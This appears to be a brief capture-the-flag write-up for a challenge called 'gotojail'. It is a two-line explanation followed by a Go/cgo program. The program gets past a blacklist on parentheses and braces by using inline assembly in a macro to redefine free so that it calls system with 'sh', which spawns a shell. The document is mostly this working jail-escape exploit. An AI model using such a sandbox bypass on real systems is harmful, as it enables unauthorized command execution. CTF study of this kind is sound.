gotojail
Noticed that we can use cgo
Bypassed (){} blacklist by using asm() to spoof free function and a gadget in #<netipx/ipx.h>
package main
//#include <netipx/ipx.h>
//#define SIOCPROTOPRIVATE"free:movq $0x6873,\050%rdi);jmp system;.globl free;"
//__asm__ SIOCAIPXITFCRT;
import "C"
func main(){}